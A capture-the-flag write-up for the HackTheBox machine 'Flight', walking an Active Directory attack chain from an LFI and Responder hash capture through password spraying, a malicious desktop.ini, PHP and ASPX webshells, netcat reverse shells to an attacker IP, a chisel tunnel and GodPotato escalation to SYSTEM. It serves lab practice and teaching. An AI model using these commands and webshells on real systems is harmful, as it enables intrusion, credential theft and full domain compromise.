~/writeups/Flight
Hard Windows Active Directory
Flight.
Hard Windows Active Directory LFI → NTLM Password Spray GodPotato HackTheBox
Hard Windows Active Directory machine with a long but logical chain. A PHP ?view= parameter accepts UNC paths — pointing it at Responder captures an NTLMv2 hash for svc_apache. Password spray hits S.Moon, who can write to a Shared share. A malicious desktop.ini captures c.bum's hash, giving write access to the Apache webroot. A PHP webshell lands a shell as svc_apache. RunasCs pivots to c.bum, who can write to IIS's development root on port 8000. A chisel tunnel exposes the internal port, an ASPX webshell runs as the IIS AppPool with SeImpersonatePrivilege, and GodPotato escalates to SYSTEM.
User Flag
C:\Users\C.Bum\Desktop\user.txt
Root Flag
C:\Users\Administrator\Desktop\root.txt
01Reconnaissance

Full port scan confirms a Domain Controller. The web server on port 80 is Apache 2.4.52 with PHP 8.1.1 serving a static "g0 Aviation" site. Domain is flight.htb.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.228.120 53/tcp open domain Windows DNS 80/tcp open http Apache 2.4.52 (PHP 8.1.1) — "g0 Aviation" 88/tcp open kerberos-sec Windows KDC 389/tcp open ldap Active Directory (Domain: flight.htb) 445/tcp open microsoft-ds SMB (signing required) | clock-skew: +6h58m
clock skew ~7h: Kerberos requires clocks within 5 minutes of the DC. If you hit KRB_AP_ERR_SKEW, sync first: sudo ntpdate -u 10.129.228.120. NTLM-based attacks are unaffected by skew.
env setup
$ echo "10.129.228.120 flight.htb" | sudo tee -a /etc/hosts $ export IP=10.129.228.120 $ export DOMAIN=flight.htb

SMB null auth works (login succeeds) but share enumeration and RID brute are denied. Guest is disabled. We need credentials first — the web app is the way in.

02VHost Discovery — school.flight.htb

The main site is a static brochure — no PHP endpoints, no login forms. Fuzz the Host header to discover other virtual hosts on the same IP.

ffuf — vhost fuzzing
$ ffuf -u http://flight.htb/ -H "Host: FUZZ.flight.htb" \ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \ -t 100 -mc 200,301,302,403 -fs 7069 school [Status: 200, Size: 3996]
common mistake: don't fuzz via http://FUZZ.flight.htb/ in the URL — that relies on DNS resolving the subdomain. Always use -H "Host: FUZZ.flight.htb" against the IP and filter by size to remove the baseline response.
add vhost
$ echo "10.129.228.120 school.flight.htb" | sudo tee -a /etc/hosts

school.flight.htb is a PHP site with a ?view= parameter — a classic LFI candidate.

03LFI → UNC Path → NTLM Hash (svc_apache)

The ?view= parameter loads local files — confirmed by reading the hosts file directly. PHP's include() also supports UNC paths. When PHP on a Windows server tries to open \\attacker\share, Windows initiates an SMB connection and leaks an NTLMv2 hash.

confirm LFI
$ curl "http://school.flight.htb/index.php?view=c:/windows/system32/drivers/etc/hosts" # Copyright (c) 1993-2009 Microsoft Corp... 127.0.0.1 localhost
responder — start listener
$ sudo responder -I tun0 -v
trigger UNC path via LFI
$ curl "http://school.flight.htb/index.php?view=//10.10.14.78/share" [SMB] NTLMv2 Hash : svc_apache::flight:aad3b435...(hash)
hashcat — crack NTLMv2
$ hashcat -m 5600 ntlm_hash /usr/share/wordlists/rockyou.txt svc_apache::flight:...:S@Ss!K@*t13
credential: svc_apache:S@Ss!K@*t13. NTLMv2 mode is -m 5600 — not to be confused with NTLMv1 (-m 5500) or Net-NTLMv2 relay attacks.
04Password Spray → S.Moon → desktop.ini → c.bum

With svc_apache credentials we can enumerate domain users, then spray the cracked password across all accounts — service accounts often share passwords with regular users.

user enum + spray
$ nxc smb $IP -u svc_apache -p 'S@Ss!K@*t13' --users | awk '{print $5}' > users.txt $ nxc smb $IP -u users.txt -p 'S@Ss!K@*t13' --continue-on-success [+] flight.htb\S.Moon:S@Ss!K@*t13
S.Moon share access
$ nxc smb $IP -u s.moon -p 'S@Ss!K@*t13' --shares Shared READ,WRITE

S.Moon can write to the Shared share. When a user browses a network share in Windows Explorer, their system auto-authenticates to load icons and thumbnails. Drop a desktop.ini pointing at our Responder to capture their hash.

desktop.ini — malicious icon path
$ cat > desktop.ini << 'EOF' [.ShellClassInfo] IconResource=\\10.10.14.78\share\icon.ico EOF $ smbclient //$IP/Shared -U 's.moon%S@Ss!K@*t13' -c "put desktop.ini"
responder captures c.bum's hash
[SMB] NTLMv2 Hash : c.bum::flight.htb:aad3b435...(hash)
hashcat — crack c.bum
$ hashcat -m 5600 hash2 /usr/share/wordlists/rockyou.txt c.bum::flight.htb:...:Tikkycoll_431012284
c.bum share access
$ nxc smb $IP -u c.bum -p 'Tikkycoll_431012284' --shares Web READ,WRITE
credential: c.bum:Tikkycoll_431012284. The Web share maps to C:\xampp\htdocs — the Apache webroot. Write access here means code execution.
05PHP Webshell → Shell as svc_apache

The Web share is the Apache document root. Upload a PHP webshell and netcat into the school.flight.htb subdirectory.

smbclient — upload webshell + nc
$ echo '<?php system($_GET["cmd"]); ?>' > shell.php $ smbclient //$IP/Web -U 'c.bum%Tikkycoll_431012284' \ -c "cd school.flight.htb; put shell.php; put nc.exe"
note: the box periodically cleans uploaded files. If the webshell returns 404, just re-upload via SMB and retry.
verify RCE + get reverse shell
$ curl "http://school.flight.htb/shell.php?cmd=whoami" flight\svc_apache $ nc -lvnp 4444 $ curl "http://school.flight.htb/shell.php?cmd=nc.exe+-e+cmd.exe+10.10.14.78+4444"
06RunasCs → c.bum + User Flag

From the svc_apache shell, internal recon reveals two important things: port 8000 is listening internally (IIS, not exposed externally), and c.bum has write access to C:\inetpub\development\ — the IIS app root on that port. We need to be c.bum to write there.

internal recon
C:\> netstat -ano | findstr LISTEN TCP 0.0.0.0:8000 0.0.0.0:0 LISTENING C:\> icacls C:\inetpub\development\ flight\C.Bum:(OI)(CI)(W)

RunasCs runs commands as another user without needing an interactive logon session — useful when you have credentials but no GUI or interactive shell. Upload it via the Web share and pivot to c.bum.

RunasCs → c.bum shell
$ nc -lvnp 4445 C:\xampp\htdocs\school.flight.htb> .\RunasCs.exe c.bum Tikkycoll_431012284 ".\nc.exe -e cmd.exe 10.10.14.78 4445" --logon-type 8
user flag
C:\Users\C.Bum\Desktop> type user.txt ************************
07Chisel Tunnel + IIS ASPX Webshell

Port 8000 is firewalled externally. Use chisel to create a reverse TCP tunnel so we can reach it from Kali. Then deploy an ASPX webshell — PHP doesn't run on IIS, we need ASP.NET.

chisel — reverse tunnel
$ chisel server -p 9001 --reverse C:\> chisel.exe client 10.10.14.78:9001 R:8000:127.0.0.1:8000

http://127.0.0.1:8000 on Kali now maps to port 8000 on the target. From the c.bum shell, copy the ASPX webshell, nc.exe, and GodPotato into C:\inetpub\development\:

deploy ASPX webshell to IIS root
C:\> copy C:\xampp\htdocs\school.flight.htb\shell.aspx C:\inetpub\development\shell.aspx C:\> copy C:\xampp\htdocs\school.flight.htb\nc.exe C:\inetpub\development\nc.exe C:\> copy C:\xampp\htdocs\school.flight.htb\GodPotato-NET4.exe C:\inetpub\development\GodPotato-NET4.exe
verify IIS identity + privileges
$ curl "http://127.0.0.1:8000/shell.aspx?cmd=whoami" iis apppool\defaultapppool $ curl "http://127.0.0.1:8000/shell.aspx?cmd=whoami+/priv" SeImpersonatePrivilege Impersonate a client after authentication Enabled
finding: IIS AppPool accounts almost always hold SeImpersonatePrivilege — they need it to impersonate authenticated web users. Combined with any potato exploit, SYSTEM is one command away.
08GodPotato → SYSTEM

GodPotato abuses SeImpersonatePrivilege by tricking a SYSTEM-level COM server into authenticating to a fake endpoint we control, then stealing its token to run arbitrary commands as SYSTEM. Works on modern Windows without needing a writable named pipe.

get IIS shell + run GodPotato
$ nc -lvnp 4446 $ curl "http://127.0.0.1:8000/shell.aspx?cmd=C:\inetpub\development\nc.exe+-e+cmd.exe+10.10.14.78+4446" C:\inetpub\development> .\GodPotato-NET4.exe -cmd ".\nc.exe -e cmd.exe 10.10.14.78 4447"
SYSTEM shell + root flag
nc -lvnp 4447 C:\> whoami nt authority\system C:\> type C:\Users\Administrator\Desktop\root.txt ************************
09Full Attack Chain
attack chain summary
Nmap → DC on 10.129.228.120, Apache on port 80, clock skew ~7h │ ▼ ffuf vhost fuzz → school.flight.htb discovered PHP ?view= parameter → LFI confirmed │ ▼ LFI + UNC path → Responder captures SMB auth hashcat -m 5600 → svc_apache:S@Ss!K@*t13 │ ▼ Password sprayS.Moon:S@Ss!K@*t13 Shared share WRITE → desktop.ini (malicious icon UNC) → Responder → hashcat → c.bum:Tikkycoll_431012284 │ ▼ c.bum → Web share WRITE (C:\xampp\htdocs) PHP webshell → shell as flight\svc_apache │ ▼ RunasCs (c.bum creds) → shell as flight\c.bumuser.txt ✓ → write access to C:\inetpub\development\ (IIS port 8000) │ ▼ chisel reverse tunnel → port 8000 exposed on Kali ASPX webshell deployed → iis apppool\defaultapppool SeImpersonatePrivilege enabled │ ▼ GodPotato → token impersonation → nt authority\systemroot.txt ✓
key takeaways:
· Any PHP include() accepting user input can be pointed at a UNC path to leak NTLMv2 hashes on Windows
· Always spray every cracked password across all known users — service accounts often share passwords
· A malicious desktop.ini with a UNC icon path captures hashes from anyone who browses the share
· SMB write to a webroot = PHP code execution; check net share to map share names to local paths
· RunasCs enables lateral movement with known creds without needing an interactive session
· Always run netstat -ano from a foothold — firewalled internal ports often host the privilege escalation path
· IIS AppPool + SeImpersonatePrivilege + GodPotato = SYSTEM on any modern Windows version
· Chisel is the go-to for tunneling through firewalled internal services
← all writeups